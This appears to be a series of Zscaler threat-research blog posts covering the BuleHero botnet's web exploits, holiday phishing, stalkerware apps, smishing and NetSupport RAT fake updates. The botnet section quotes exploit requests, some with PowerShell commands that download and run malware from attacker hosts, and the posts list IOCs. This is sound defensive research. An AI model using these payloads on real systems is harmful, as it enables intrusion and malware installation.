Along with the SMB exploits, the botnet contains exploits for well-known web applications. These exploits are fired against web servers obtained from the post scanning result.
Web Application Exploits
Apache Tomcat PUTs vulnerability (CVE-2017-12615)
This vulnerability affects Apache Tomcat 7.0.0 to 7.0.79 on Windows with the HTTP PUTs method enabled. It uploads a maliciously crafted JSP file to the server.
Fig 13: Crafting request after uploading FxCodeShell.jsp
Exploit::/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Ffk.0xbdairolkoie.space%2Fdownload.exe
Apache Struts RCE vulnerability (CVE-2017-5638)
This vulnerability affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Apache Struts is a free and open-source framework used to build Java web applications. This particular vulnerability can be exploited if the attacker sends a crafted request to upload a file to a vulnerable server that uses a Jakarta-based plugin to process the upload request. The attacker can then send malicious code in the "Content-Type" header to execute the command on a vulnerable server.
Fig 14: Crafting request to exploit Apache Struts vulnerability
Exploit::/struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data')... Post.Open "GET","hxxp://fk.0xbdairolkoie[.]website/download.exe",0 >>..
Oracle WebLogic server vulnerability (CVE-2018-2628)
This vulnerability allows an unauthenticated attacker with network access via the T3 protocol to compromise an Oracle WebLogic Server running on port 7001. The affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3
Fig 15: sending T3 handshaking request
Fig 16: sending payload to execute on server
WebLogic Deserialization RCE vulnerability (CVE-2019-2725)
Oracle WebLogic Server is prone to a remote command-execution vulnerability due to deserializing input information. Specifically, this issue affects the "wls9_async" and "wls-wsat" components. An attacker can exploit this issue to execute arbitrary commands. The affected versions are 10.3.6.0.0 and 12.1.3.0.0.
Fig 17: Constructing malicious payload request
Exploit::port/wls-wsat/CoordinatorPortType OR
:port/_async/AsyncResponseService
Data: payload
Oracle WebLogic Server vulnerability (CVE-2017-10271)
This vulnerability in the Oracle WebLogic Server component of WLS security allows an unauthenticated attacker with network access via the T3 protocol to compromise the server. The affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0.
Fig 18: Constructing malicious payload request
ThinkPHP v5 Remote Code Execution vulnerability
The reason for this vulnerability is that the underlying layer of the ThinkPHP5 framework does not strictly filter the controller name, which allows an attacker to call sensitive functions inside the ThinkPHP framework through the URL, which leads to the download and installation malware.
It tries to download and execute malware by running PowerShell from "cmd" due to this vulnerability.
Fig 19: ThinkPHP vulnerability to download and execute malware
It tries to install hydra.php due to this vulnerability, and installs a web-shell that executes commands.
Fig 20: ThinkPHP vulnerability to install malware by web-shell
It also installs hydra.php to launch PowerShell from "cmd," and downloads and execute the malware.
Fig 21: ThinkPHP vulnerability to download and execute malware by hydra.php
Exploit:GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%http://20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/2.250.20/12.exe');start%20C:/WebKit/2.250.20/12.exe
Drupal Remote Code Execution vulnerability (CVE-2018-7600)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. It allows an attacker to inject a malicious payload into a form structure to execute arbitrary code.
Fig 22: Construct a request payload to exploit Drupal vulnerability
Exploit:URL : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Payload: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]= “malicious commands”
Apache Solr Remote Code Execution vulnerability (CVE-2019-0193)
This vulnerability exists in the DataImportHandler module, a common module used to import data from databases or other sources. The whole DIH configuration of this module can come from the dataConfig parameter included in an external request. As a DIH configuration can contain scripts, this parameter is a security risk.
An attacker could exploit this vulnerability to cause arbitrary code execution via a malicious request that contains a carefully crafted dataConfig parameter. Affected versions: Apache Solr
PHPStudy backdoor
The BuleHero malware checks the below PHP module paths if it exists, then it replaces that module with the embedded backdoor, which allows an attacker to execute any command on the server.
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
This module is the same as those that were being spread by the PhpStudy official site when it was compromised. The purpose of these implanted backdoors was mainly for the remote code execution.
Fig 24: Drop php_xmlrpc.dll if already exists
Other than making the infected system vulnerable, this malware targets the scanned IPs to download and execute the payload.
Fig 25: Crafting a request with malicious payload
Exploit:URL: /index.php
Accept-Encoding: gzip,deflate
Accept-Charset:
Conclusion
Inclusion of lateral propagation in any type of malware makes it more dangerous, as it can compromise an entire network. By including several exploits and methods for spreading across the network, the malware has multiple options which makes it more robust. We have been observing an increase in such malware since 2017. We advise users to keep systems updated with the latest operating system updates and security patches and to harden servers and endpoints. It's also important to update software security regularly to defend against such malware. Zscaler provides a layered security offering which protects against new and evolving malware, like the BuleHero botnet. The inclusion of Cloud IPS in the Zscaler platform protects customers against the exploits used in lateral propagation.
Zscaler protection
Fig 26: Zscaler Sandbox report
IOCs:
URLs:
aa[.]0xbdairolkoie[.]space/xs.exe
aa[.]0xbdairolkoie[.]space/swpuhostd.exe
fk[.]0xbdairolkoie[.]space/download.exe
xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
aa[.]openyourass[.]icu/xs[.]exe
fk[.]openyourass[.]icu/securitydnsservice[.]exe
fk[.]openyourass[.]icu/download[.]exe
ae86[.]decode0x[.]fun:63145/cfg[.]ini
ae86[.]decode0x[.]host:63145/cfg[.]ini
ae86[.]decode0x[.]icu:63145/cfg[.]ini
ae86[.]decode0x[.]online:63145/cfg[.]ini
ae86[.]decode0x[.]pw:63145/cfg[.]ini
ae86[.]decode0x[.]site:63145/cfg[.]ini
s4f5er4t5g1df23saadse[.]club:63145/cfg[.]ini
ox[.]mygoodluck[.]best
mi.oops[.]best:80
mx.oops[.]best:443
IPs:
172[.]104[.]91[.]191
139[.]162[.]2[.]123
185[.]147[.]34[.]106
185[.]147[.]34[.]136
Hashes:
F864506F9797592321CF4C6A0BB5F199 (xs.exe)
ECB3266326D77741815ECEBB18EE951A (swpuhostd.exe)
1B20076D8470AA308E24A2098786ECDD (svtink.exe)
398FB3FED9BE2941F3548A5D0D4B862C (vqbbqs.exe)
EA774C81FE7B5D9708CAA278CF3F3C68 (vqfevffuz.exe)
1F2E820A81AE38E9E8DC173975AB57A6 (vfshost.exe)
F89544ECBF66E93C2821625861AE8821 (AppCapture32.dll)
B1956FE89E3D032BE3A06820C63F95A6 (AppCapture64.dll)
FB82BA8BB7A402B05D06436991B10321 (ShellCode.ini)
D464F1D389593B6DC285E64BC8B211AC (docmicfg.exe)
6612282F37F7CBDD2A962577FA49EF66 (schoedcl.exe)
22BB1452CA9BC4B8D346368D3F4DB6C2 (spoolsrv.exe)
E4FF1EF997A3A1419F22938F83C91E45 (svschost.exe)
48442048EE3AB045FCB08809597E03B4 (vimpcsvc.exe)
BD5AF8E9AFEA8D8173854F0A0C038B68 (SecurityDnsService.exe)
982C401A9D6F7016D910E8E60F17A0FB (AppCapture32.dll)
6E7E98549BAA186D3A0E3D1840B05ABF (AppCapture64.dll)
Categories: Security Posts
A Big Day for Phishing
We hope you enjoyed your own Black Friday and found everything you wanted as you were shopping the sales. The threat actors certainly attempted to take advantage of the zeal of holiday shoppers. As a follow-up to our previous blog on shopping scams, we’d like to show some of the other attacks we saw during the Thanksgiving break. We’ll highlight a few more phishing tactics commonly used, a Magecart POS skimmer attack on a major brand, and further evidence of Emotet’s prevalence in the overall threat landscape.
The primary motivation of attackers is to take advantage of the online shopping season. Sales are already up for most retailers as consumers snap up deals.
Fig 1: Shopping trends continued to rise through November (the spike at the end is Cyber Monday)
Scams and phishing attempts continue at a steady pace into the holiday shopping season. Attackers know that they can cast a wide net of branded phishing attacks, gift card scams, and malicious files to boost their profitability every year.
Fig 2: Phishing attempts rose during the week before Thanksgiving and Black Friday
Magecart
Magecart has been quite active so far. We have observed consistent hits in the weeks leading up to the holiday season and they persist. The chart below shows that Magecart infections are proving to be quite a sustainable means for attackers.
Fig 3: Magecart activity tracked over two months (Oct-Nov 2019)
Recently, threat actors targeted the Macy's website. Macy's released a “Notice Of Data Breach” on November 14, 2019. The company stated that the site was compromised by attackers on October 7, 2019. The attackers had inserted an obfuscated version of a Magecart script to the Macy's Checkout and My Wallet pages. According to the breach notice, attackers were able to capture user credit card data. The user-submitted details were exfiltrated to a command-and-control (C&C) server at barn-x[.]com.
Phishing
As we reported in the previous blog, Amazon has been heavily targeted this season, but it isn’t the only brand under attack. All major brands are considered fair game to threat actors. This season, Apple has become a focus of attackers. Below is one such case.
Fig 4: Fake Apple login page
One of the first things you should do before logging into sensitive websites is to check the address bar to ensure you are in the correct place. If you are unfortunate to enter your Apple ID into this portal, your information will be sent to the attackers.
Fig 5: Information is sent in clear text to the attackers as well as any other attackers currently performing a man-in-the-middle (MitM) attack
After a phishing attack is successful, users get redirected to a message about their account being locked.
Fig 6: after entering Apple login information, the user receives a message from the attacker saying the account has been locked
Black Friday Phishing
Black Friday offers aren’t just big in the U.S.—the start of the shopping season is celebrated all around the world. The image below shows a phishing page claiming to offer Black Friday deals from Americanas.com.br, a major Brazilian retail chain. Notice the domain: the entire content is hosted on Joomla. A legitimate vendor would never host its products via a content management/publishing framework.
Fig 7: Faked Americanas site being hosted on Joomla
The screen below is another example of threat actors targeting users via a fake Americanas.com.br site. As of the writing of this blog, the domain hosting this page was only five days old.
Fig 8: Faked Americanas site on a newly registered domain
Emotet
In our previous blog, we discussed how webmail was a critical element in Emotet infection downloads. Another attack vector favored by threat actors is leveraging compromised WordPress sites—specifically, SSL-secured WordPress sites. Attackers assume (correctly, in many cases) that consumers don’t have a security solution that inspects encrypted traffic (HTTPS). In fact, when you look at the last 1,000 confirmed Emotet samples on URLhaus, 475 of them at the time of this research were using HTTPS to infect users.
Fig 9: HTTPS is the primary method of infection
Conclusion
The Zscaler ThreatLabZ team will continue to track and block various campaigns and tools used by threat actors. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves, particularly during the shopping season, by reviewing our security checklist:
Change your passwords for critical and important accounts
Enable two-factor authentication, or “2FA”
Ensure HTTPS is inspected by your security solution; check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites
Be vigilant about invoices/orders arriving in email; do not forward such attachments to anyone and be sure to follow IT protocol
Be vary of tracking number links in emails from shipping/courier companies, as they may direct you malicious sites
Do not click on any links from unrecognized senders; even if you do not follow through, the action of clicking the URL is a beacon for the attacker
Do not provide any credentials via Google docs; legitimate vendors do not ask for credentials via this medium
Avoid using public or unsecured Wi-Fi connections for shopping
Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware
Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message
Report incidents to the FTC
Categories: Security Posts
A New Wave of Stalkerware Apps
Recently, the U.S. Department of Homeland Security (DHS) released an article warning mobile users about the increasing use of spyware apps.
The US-CERT (Computer Emergency Response Team) issued the following statement:
The statement was released just after the Federal Trade Commission (FTC) marked its first case against stalking apps (also known as stalkerware or spyware apps). A case was filed against a company that developed and distributed stalking apps that could track smartphone activities like call history, text messages, photos, locations, browser history, and more. These apps were marketed as apps for monitoring the location and activities of children, employees, or spouses.
According to the FTC's complaint, the company did not take steps to ensure that purchasers were using the apps for legitimate purposes.
During the timeframe when the US-CERT released its statement, we noticed some hits on the Zscaler cloud in relation to spyware activities. We frequently detect the presence of spyware apps such as Spymie, TruthSpy, iSpyoo, GuestSpy, Spynote, NeoSpy, among others, on the Zscaler cloud, but we also found some new actors in this period.
In this blog, we will briefly discuss these new spyware apps. The blog is divided into three parts. First, we discuss typical stalkerware functionalities, then we'll explore some of the different types of spyware apps we've seen in the last few months, and in the final part we'll cover the indicators of compromise (IOCs).
Stalkerware (stalking apps or spyware), as the name suggests, is a type of app that spies on victims. Stalkerware apps are capable of, but not limited to, performing the following functions:
Stealing contacts
Spying on text messages
Stealing photos
Spying on browsing history
Spying on banking apps
Stealing GPS locations
Normally, one is required to have physical access to a mobile device in order to install spyware apps, but an attacker can use social engineering tactics to get the victim to install spyware.
Once installed, the typical spyware app will typically gain admin-level access, hide itself, spy on the victim, and, finally, send the stolen data to the attacker.
The following is an abstract about some spyware apps we found on the Zscaler cloud.
Android Monitors
Package Name: com.ibm.fb
Hash : 97c6c8b961d57d4ebad47f5c63ec6446
We saw multiple entries of spyware apps dubbed Android Monitors. Upon looking at the icon, we believe it is in its development phase. Once installed, it cleverly safeguards itself from Google's security framework, Play Protect.
Fig 1: Android Monitor initial setup
The screenshot below shows the functionality of the app's keylogger. If enabled, this app can spy on everything that the victim types, which can include personal WhatsApp messages, Facebook chats, emails, banking activities, and much more.
Fig 2: Android Monitor keylogging
The above screenshot also has an email ID column to which all the stolen data is sent.
The Zscaler analytical system precisely detects this spyware. The following screenshot highlights the main functionalities of the app.
Fig 3: Zscaler Cloud Sandbox with Android Monitor sample
Russ City
Package Name: city.russ.alltrackercorp
Hash: 3b388138584ad3168e745097d5aa4206
This spyware app portrays itself as Thief Tracker. Further hunting for similar samples from the same source, we found two more apps, named System Info and System Updater. Upon analysis, we noticed that all three apps were the same; their only difference was their names.
The screenshot below shows how the three spyware apps appeared upon installation:
Fig 4: Spyware app icons
The complete functionality of this spyware can be seen in its manifest file, below.
Fig 5: AndroidManifest.xml
This app performs various background services:
Read text messages
Get browser history
Fetch call logs
Get GPS location
Get clicked photos
Record audio
Record voice calls
Capture screenshots
Fig 6: Android services
Spy Phone App
Package Name: com.spappm_mondow.alarm
Hash : 001209b1e2760f88f2bb4b68f159a473
This app was delivered via Google Drive and contained almost all possible spyware functionalities, as shown in the screenshot below:
Fig 7: Zscaler Sandbox displaying Spy Phone analysis
We found its platform online where the attacker can log in and check all the stolen data stored in this one place.
Fig 8: Spy Phone App control panel
Wi-Fi Settings
Package Name: com.wifiset.service
Hash : 8dab7a558f91e72e3edae8e20ee55c86
This stalkerware portrays itself as a settings app for Wi-Fi. One unique feature of this app is its method for staying persistent. During the installation process, it installs an additional app named Update Settings.
The screenshot below shows this functionality in action.
Fig 9: Initial installation steps
Once the initial setup is done, the attacker can enter his/her credentials and leave the rest on spyware. As soon as the spyware gets an internet connection, it starts sending the stolen data to a command & control (C&C) center/server. We noticed a major flaw with this spyware. It sends all the stolen data over plain-text (HTTP), which compromises the victim's data at the secondary level. As shown in the following screenshot, the user credentials are sent in plain text:
Fig 10: Plain text communication
The screenshot below shows stolen photos being uploaded to the C&C server with basic Base64 encoding.
Fig 11: Spyware uploading photos from the victim's device
Data Controller
Package Name: lookOut.Secure
Hash : 33dcfd84589c6ccf00fa5a302cefd0fe
This app portrays itself as Data Controller and has the package name lookout.Secure. It is strange to see a package called Lookout, as a legitimate company called Lookout is a highly regarded mobile security company. The attacker might have used this package name in order to trick users into trusting the app. Once installed, it asks for the purpose of use and whether the attacker wants to keep it hidden from the victim or not. (Spyware always prefers to hide itself to evade detection.)
Fig 12: Initial installation steps
The Zscaler Cloud Sandbox report shows the major spying capabilities in this spyware:
Fig 13: Sandbox report of the Data Controller app
Auto Forward
Package Name: com.autoforward.monitor
Hash: 66dbd2d7614555440b657ae24527034a
It's common for spyware apps to portray themselves as parental-control apps. This is the case with Auto Forward spyware.
As soon as the spyware is installed, it displays itself as an app named Device. It asks for all available permissions necessary to spy, as shown in the screenshot below:
Fig 14: Initial installation steps
On its official website, Auto Forward assures users that the spyware works on both Android and iOS platforms.
Once installed, it steals the personal data of the victim and forwards it to its server, where the attacker can easily view stolen data such as text messages, WhatsApp activities, GPS locations, photos, a list of installed apps, and so on.
Conclusion
Spyware apps often portray themselves as parental-control apps or apps that can monitor employee whereabouts or the activities of a spouse suspected of cheating. Although there are legitimate uses, such as parents monitoring their children's location, these types of apps are often used maliciously.
Most of the spyware in this report were not properly designed. They store stolen data on a server without any security, which creates a single point of failure. Worse, a single instance of compromise can leak every victim's data into the wild.
Secondly, we observed the stolen data being transferred to C&C servers over plain-text channels, which can be compromised by man-in-the-middle attacks.
These flaws would not be acceptable with any legitimate app because they threaten the privacy of the users, potentially revealing their personally identifiable information (PII), which is obviously not a concern to the attackers.
Smartphone users who suspect their privacy may have been compromised by such apps can consider following these steps:
Use a legitimate antivirus app that is regularly updated
Try factory-resetting your device
Remove suspicious apps from device administrator list
( settings --> security --> device administrators)
Zscaler customers are protected from stalkerware apps.
IOCs
Hash
97c6c8b961d57d4ebad47f5c63ec6446
b0e68b66a5ba47612f2a6a33b343503b
93e969ea1118a9d00be7f1c74b50fce9
b44a98af29b021ad5df4ac6cc38fecf5
d4ecbf666d17326deab49f75588e08b3
9eaf38020f898073af1a3ce34226c91f
ea1546f34a6cd517dcfec07861b7fb4f
5fbb1b497c5a86815e5e8cc092d09af0
10322c7dea57269d69a85699e0357f5f
3b388138584ad3168e745097d5aa4206
369a17a8e1031101f41cc31caac56b9c
ba63ae94bdec93abc144f3b628d151ad
8dab7a558f91e72e3edae8e20ee55c86
001209b1e2760f88f2bb4b68f159a473
33dcfd84589c6ccf00fa5a302cefd0fe
66dbd2d7614555440b657ae24527034a
URLs
russ[.]city/apks/alltracker_thief_v.6.5.2.apk
russ[.]city/apks/systeminfo_v.6.5.2.apk
russ[.]city/apks/systemupdater_v.6.5.2.apk
206.41.116[.]121
dwn[.]vys.me
Categories: Security Posts
Scamming and Smishing while Shopping
A few weeks ago, the witches and skeletons that decorated shop windows for Halloween were swept aside and replaced with reindeer and jolly elves. Fir trees supplanted the pumpkins and “Jingle Bells” began drifting from speakers buried under mounts of artificial snow. It all means one thing: the start of the holiday shopping season, which kicks into high gear on Black Friday.
Cyber Monday, which began in 2005, has surpassed Black Friday as the biggest shopping day of the year and, not surprisingly, it has become a major target for cybercrime. But in a report our ThreatLabZ researchers did last year, we were somewhat surprised to see the shifting volumes of activity, which spiked a week before Cyber Monday and dropped off significantly on the day itself. We saw this as an example of the increasing sophistication of attack campaigns, as those carrying them out had begun to mirror the strategies of retail marketers.
The Zscaler cloud processes about 75 billion transactions a day for our enterprise customers, and though the bulk of the traffic is business-related, the sheer volume gives us a sweeping view of activity across the internet. Since the beginning of November, we have seen a marked increase in what we identify as shopping traffic. We are also seeing activity that could foreshadow a busy holiday season for cybercriminals. This activity includes phishing that’s targeting well-known shopping brands, phishing attacks targeting mobile phones, site skimmers looking to harvest credentials from compromised e-stores, scam sites offering gift cards, and banking Trojans trying to turn your PC or mobile device into an ATM.
Figure 1: Shopping traffic on the Zscaler cloud between Oct. 21 and Nov. 17, 2019, averaging nearly 600 million transactions per weekday
Phishing activity tends to rise when the shopping season begins, as attackers know that shoppers may be more likely to respond to “special offers” or notifications relating to shipping and similar matters. Threat actors adjust their phishing kits accordingly, sometimes with seasonal messages and designs. We calculated an increase of more than 400 percent in phishing activity between the first 14 days of October and the first 13 days of November.
Figure 2: Phishing activity between Oct. 2 and Oct. 14, 2019
Figure 3: Phishing activity between Nov. 2 and Nov. 14, 2019
Three cases of phishing attacks on shoppers
Because Amazon is by far the busiest shopping site, it has the highest likelihood of being on the radar of scammers looking to attack a broad audience. Below, we'll discuss some of the ways that attackers are leveraging Amazon’s popularity for their own money-making schemes.
Case 1: Fake Amazon Gift Cards
Everyone loves giving and receiving gift cards, but the phony versions being generated by scammers are dangerous. If you were to click the link (as shown below), you would be redirected to a phishing page that will attempt to collect your login credentials.
The following scam arrives via email, congratulating the recipient for qualifying to receive a reward for taking an anonymous survey—but, it says, it must be done in five minutes.
Figure 4: Phishing attempt
Figure 4a: HTML of the page shows the attempt to pose as an Amazon Gift Card
Case 2: Fake Amazon Login
A common way that attackers try to compromise your Amazon account is through the use of an email or site posing as a legitimate Amazon site. Be wary of any emails posing as Amazon Customer Service alerts or payment invoices as these are common hooks attackers will use to appear legitimate and get victims to click their links. ThreatLabZ has been monitoring one campaign that was sending PDF or DOC files to victims in the hopes they would click through and enter their credentials (see the image below).
Figure 5: Letter impersonating Amazon in an attempt to capture user credentials
By clicking the link in the letter, you would be redirected through several URL shorteners before eventually landing on a compromised site hosting an “Amazon” phishing kit. The site was down at the time of this publication, but the screenshot from early on in the campaign shows a near-perfect copy of an Amazon login screen that is set up to steal credentials.
Figure 6: Faked Amazon login screen
Case 3: Emotet Trojan
A popular method that attackers use to target victims is through the use of scam emails or URLs that pretend to be legitimate purchase orders or invoices; these may appear as links or attachments. This has become a common method for distributing one of the most prevalent banking trojans out there, Emotet. The following case actually comes from the site: http://phamthaifood[.]com/4ib60l/Amazon/Orders-details/10_19/.
Opening this document in a secured environment still asks the user to enable editing to allow the attack to commence.
Figure 7: Allowing active content of suspicious files is not recommended
An analysis of the document in question provides a glimpse into the PowerShell that will execute on the victim's system.
Figure 7a: Malicious PowerShell
The PowerShell mentioned above will download and execute the Emotet trojan. Running this through a dynamic analysis will reveal a malicious attack.
Figure 7b: Threat score of Emotet as identified by Zscaler Cloud Sandbox
Once the document is opened, it will execute encrypted PowerShell commands to install the banking trojan onto the victim’s system. We've written extensively about the resurgence of the Emotet malware in earlier blogs.
PayPal Phishing
In addition to shopping sites, banking and personal finance sites, such as PayPal, become frequent targets during the holidays. PayPal is one of the most accepted secure payment options used by vendors. Threat actors know this and use it as another primary target for phishing attacks. Some of these attacks are easy to recognize (as shown below) because they are served over non-secure connections using HTTP, which is always a tell-tale sign of a phishing attempt.
Figure 8: Faked PayPal login screen
Some attacks, on the other hand, can be quite elaborate, as shown below. They are served over an HTTPS connection and the interface presents a very good reproduction of the official PayPal site. The domain name (paypal.com.hrmy.mtbank[.]shnpoc[.]net) could easily be missed because many people believe that as long as they see “paypal.com,” the site is legitimate. Particularly when viewed on a mobile device, it would be difficult to see that the URL does not belong to PayPal, but “shnpoc.net.”
Figure 9: Faked PayPal login screen
The example below appears to be a PayPal site that enables you to sign up for a personal or business account, or even recover your password. But any personal and financial information you enter will be captured by the scammers.
Figure 10: Faked PayPal registration screen
Smishing Campaign
Many consumers are seeing an increase in order and delivery messages on their mobile devices. Scammers use this opportunity to lure users into revealing personal information through SMS phishing (“smishing”) techniques. With Smishing, attackers send an SMS message to mobile users containing live links that, when clicked, redirect the user to phishing pages and result in credential theft and can lead to financial theft. In the example shown below, we saw SMS messages notifying the user of an online order with a link to follow for more details.
Figure 11: Smishing attempt
Once clicked, the user is redirected to cyzoone(.)xyz. This site poses as a poll site to lure victims into entering to win up to $35,000. To take part in the poll, victims have to register using their names.
Figure 12: Smishing attempt using a survey with cash prize
Upon clicking the PARTICIPATE button, the site begins asking poll questions. The questions we observed were about cars, perfumes, and watches, among other things, and can be observed in the following screenshots.
Figure 13: Smishing attempt using a survey with cash prize
Once finished with the poll questions, the screen shows the amount that the victim has “won.” Now that the user is fully invested in this deception, the scam starts. The attacker claims, due to payment system limits, that the payment will be sent in two parts. But, to get that amount in full, the user has to pay $35, as shown in the following screenshot.
Figure 14: Scam message saying if you pay $35, you will receive $26,600
Upon clicking the payment button, the scam redirects to a payment page hosted on paybank(.)expert asking the user for a credit card number, CVV number, and the expiration date of the card.
Figure 15: Payment screen as part of a smishing scam
After filling out the form and clicking the Pay Now button, the payment information will be sent to the attacker’s site, as shown in the below screenshot. This gives the attackers access to the victim’s account.
Figure 16: Scammer’s site
We also checked on the stats of the bit.ly link included in the original SMS message and observed that there were more than half a million clicks on this link in a 24-hour period, which shows the widespread reach of this scam.
Figure 17: Clicks on the scammer’s original smishing message
Magecart: Site skimmer
Magecart has been active for five years and has been successful injecting JavaScript into target websites to skim for payment information from point-of-sale portals. The injected script can be loaded directly onto the target page or loaded from a remote resource controlled by the attacker. The attack script may be injected in plain text (as shown below) or obfuscated to avoid detection.
Figure 18: E-commerce site compromised by Magecart
Magecart malware is capable of tracking cookies to check what data is stored and what data is sent. It also checks for the validity of the payment details entered by a user. If the payment details are valid, the malware proceeds to send the information to the attacker. This attack is smart enough to check for old card details and sends only new information to the attacker. For more detailed insight into the mechanics of Magecart, please check out our analysis here.
Figure 19: Magecart skimmer
Conclusion
The ThreatLabZ team at Zscaler will continue to track and block various campaigns and tools used by threat actors to target users. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season:
Verify the authenticity of the URL or website before accessing it. Be wary of links with typos.
Check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites. All legitimate vendors/retailers and payment portals use HTTPS connections for their transactions.
Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions.
As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities.
Avoid visiting URL shortener links.
Always ensure that your operating system and web browser are up to date and have the latest security patches installed.
Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious website bombard visitors with pop-up ads).
Only download apps from official app stores, such as Google or Apple.
Avoid using public or unsecured Wi-Fi connections for shopping.
Back up your documents and media files. You can always go the extra mile by encrypting your files.
Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware.
Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message.
Report incidents to the FTC.
Categories: Security Posts
NetSupport RAT installed via fake update notices
Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a font update. These campaigns are designed to inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information.
The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months.
Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange)
Method 1: Fake Flash Player update campaign
In this attack, cybercriminals hacked WordPress sites using the theme plugin vulnerability and injected two malicious redirect scripts in the compromised site. By using either one of the scripts, the attackers will deploy malware at the user’s end. The injected script will redirect to the malware site and download the fake update template script to show a fake Flash Player update alert to the user over the compromised site.
Figure 2: A compromised WordPress site with the fake Flash Player update page
The following figure shows the source code of the compromised website with the injected scripts.
Figure 3: The injected redirector scripts in a compromised CMS site
The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script.
Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site
The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site.
Figure 5: The second injected malicious script redirects to the chrom-update[.]online site
The attacker will send the template.js file as a layer of the compromised site with a fake update page. The fake update page template will be displayed based on the particular variable’s value, also called a “banner.”
Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]
The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.
Figure 7: A fake Flash Player update page with the link to download malicious HTA file
If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of the template.js with the link to download the malicious HTA file with the banner value 3.
Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)
Once the user runs the HTA file, it will also run the PowerShell application using the command prompt and download the RAT payload from the specified URL.
Figure 9: The source code of the downloaded malicious HTA file
Figure 10: The obfuscated content responsible for the malware download
Figure 11: The deobfuscated code showing the download link
Figure 12: Step 1 of the malware payload installation process
Figure 13: Step 2 of the malware payload installation process
Figure 14: The NetSupport RAT malware running as a client-side application
Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below.
Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format
Figure 16: The overall traffic of the fake Flash Player update malware campaign
The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users were affected by this malware attack.
Figure 17: The affected user count
Method 2: Fake font update campaign
In this attack, the cybercriminals will directly inject the fake update template script by exploiting the legitimate site to evade detection. As mentioned earlier, the template script logic will identify which browser is being used.
While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.
Figure 18: The compromised site with a fake font update page (Chrome)
The same site was accessed via Firefox and shows the same alert to the user in the Firefox template.
Figure 19: A compromised site with a fake font update page (Firefox)
The following image shows the source code of the compromised site with the injected template script.
Figure 20: The template.js is injected directly into the compromised site
The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload.
Figure 21: The source code of the template.js script with the malware download link
Figure 22: After clicking the update button, the malware payload will be downloaded (via update.exe)
The following activities were observed while executing the downloaded Trojan.
Figure 23: The program created a process “gdsun.exe” from the malware payload (a self-copy of the payload)
Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder
Figure 25: It also creates a startup registry entry for the dropped malware
It will post the following collected user data to (clickies(.)site/CC/index(.)php), which is operated by the attackers.
Figure 26: Post-infection callback traffic
Figure 27: The overall traffic of the fake font update campaign
Conclusion
